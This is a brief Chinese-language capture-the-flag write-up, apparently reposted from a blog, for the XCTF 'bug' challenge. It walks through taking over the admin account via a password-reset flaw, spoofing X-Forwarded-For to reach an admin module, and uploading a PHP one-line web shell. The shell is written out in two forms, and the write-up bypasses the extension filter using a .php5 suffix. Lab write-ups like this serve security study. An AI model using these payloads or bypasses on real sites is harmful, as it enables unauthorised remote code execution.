XCTF bug writeup

先注册一个普通用户后登陆,发现manage功能是需要admin权限才可以使用
在这里插入图片描述
因此题目的关键变成了伪造admin登陆
在这里插入图片描述
界面当中存在有修改密码的功能,考虑二次注入的问题,注册了名为admin'#12345后修改密码再以admin身份进行登陆失败,登出后发现初始界面还存在有Findpwd的功能,填入刚才注册普通用户的数据,填入新的密码后截包改包

在这里插入图片描述
修改密码成功后以admin身份登陆,点击manage功能后提示
在这里插入图片描述
使用X-Forwarded-For伪造ip为127.0.0.1,得到提示index.php?module=filemanage&do=???,需要猜测do的内容,既然模块的名称为文件管理,理所当然的想到do的内容应当是upload
在这里插入图片描述
一个文件上传的界面,我们尝试上传一个php结尾的文件其内容为<?php @eval($_POST['cmd']); ?>返回
在这里插入图片描述
貌似是检测到了我们的文件结尾,尝试在刚才的php文件名后加上.jpg后使用bp实现00截断后上传依旧提示
在这里插入图片描述
考虑可能是我们一句话木马的内容被检测机制所拦住,我们修改一句话木马为<script language="php">@eval($_POST['cmd'])</script>之后再次上传1.php.jpg依旧失败。
最后只有可能是php后缀的问题了,经过测试后php5可以绕过限制。
在这里插入图片描述

发布了46 篇原创文章 · 获赞 17 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/stepone4ward/article/details/95918132
今日推荐